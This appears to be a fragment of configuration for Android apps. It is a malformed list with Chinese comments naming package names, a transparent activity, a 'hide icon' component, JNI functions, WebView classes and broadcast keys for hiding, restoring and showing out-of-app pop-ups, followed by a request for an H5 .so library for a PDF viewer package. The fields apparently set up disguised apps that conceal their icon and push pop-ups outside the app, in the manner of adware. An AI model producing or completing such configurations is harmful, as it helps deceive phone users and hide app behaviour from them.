// 这里面的信息都需要修改
htip['com.endless.boundaries', 'com.devinfo.cupramstatus',  # 包名
               'my.dimothing.InPeek',# 透明activity
               'hi/dmo/Cabeqi',  #  广播
               '','com.endless.boundaries.PeekFo',  # 隐藏图标 other1","main2
               'bef/aligeit/fcthing', '"a0"',  # jni路径及函数
               '/hitree',# 外弹文件开关名
               '"tellnc"',# 广播接收key
               '"infoping"',  # 恢复
               '"peektalk"',  # 隐藏
               '"tssf"']  # 外弹

cesca['com.endless.boundaries', 'com.devinfo.cupramstatus',  # 包名
                  'bef/aligeit/fcthing',
                   '"b0"','"c0"', '"d0"',
                  'bef/Alo',  # hander
                  'bef/Bfell',  # wvcClass WebViewClient
                  'bef/DKaqi',  # WccClass WebChormeClient
                  '/hitree']#文件开关
钟哥，给一下H5的So呢，包名：com.pdf.viewer.edit